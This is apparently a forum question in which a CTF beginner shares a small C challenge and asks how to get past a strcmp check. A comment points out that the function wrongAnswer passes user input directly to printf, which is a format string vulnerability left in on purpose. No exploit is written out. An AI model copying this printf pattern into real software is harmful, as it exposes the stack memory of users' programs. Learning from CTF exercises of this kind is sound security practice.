0

I just started doing CTFs not so long, and get struck with this pwn challenge. Here's the code:

#include<stdio.h>
#include<string.h>

void validAnswer(char *str){
    printf("Congratulations!\n");
}

void wrongAnswer(char *str){
    printf("Unfortunately!\n");
    printf(str);
    printf("is not the correct answer");
}

int main() {
    char flag[40] = "This should be flag";
    printf("What is the answer of 1+1\n");
    char answer[64] = "";
    fgets(answer, 64, stdin);
    if(strcmp(answer, "2\n") == 0){
        validAnswer(answer);
    }else{
        wrongAnswer(answer);
    }

}

main();

I think I should overflow the fgets and call the flag, but cannot go so far because of strcmp prevent it. How can I escape it?

Altair
  • 1
  • You can't "call" the flag; it's not a function. I'd concentrate on the fact that the `wrongAnswer()` function passes user input directly to `printf()`. Assuming the `flag[]` char array hasn't been optimized away by the compiler, it should be in the stack somewhere. Read up on [format string attacks](https://owasp.org/www-community/attacks/Format_string_attack) if you haven't encountered this sort of vulnerability before. – r3mainer Nov 18 '22 at 20:55

0 Answers0